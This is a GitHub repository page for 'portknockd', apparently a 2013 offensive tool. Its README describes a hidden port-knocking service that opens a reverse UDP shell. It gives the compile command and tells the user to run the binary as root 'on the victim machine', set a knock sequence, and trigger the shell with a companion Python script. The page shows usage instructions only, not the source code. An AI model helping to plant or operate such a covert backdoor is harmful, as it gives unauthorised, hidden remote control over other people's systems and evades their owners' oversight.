Skip to content

Hidden port knocking service that spawns a reverse UDP shell.

License

Notifications You must be signed in to change notification settings

bincker/portknockd

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 

Repository files navigation

To use, compile the code with:

$ gcc -o portknockd portknockd.c

Then, simply run it as root on the victim machine. Be sure to edit the knock_sequence variable before running. These will be the ports that must be hit before the shell is activated. Once you do that, put the same knock sequence in port_knock.py with the last port being the port you want the shell spawned back on. Then simply run the python script to spawn a shell on the remote box.

This project is released under the GNU GPLv3 and I am not responsible for any damage caused using this tool.

http://blackhatlibrary.net/

jtripper (c)2013

About

Hidden port knocking service that spawns a reverse UDP shell.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published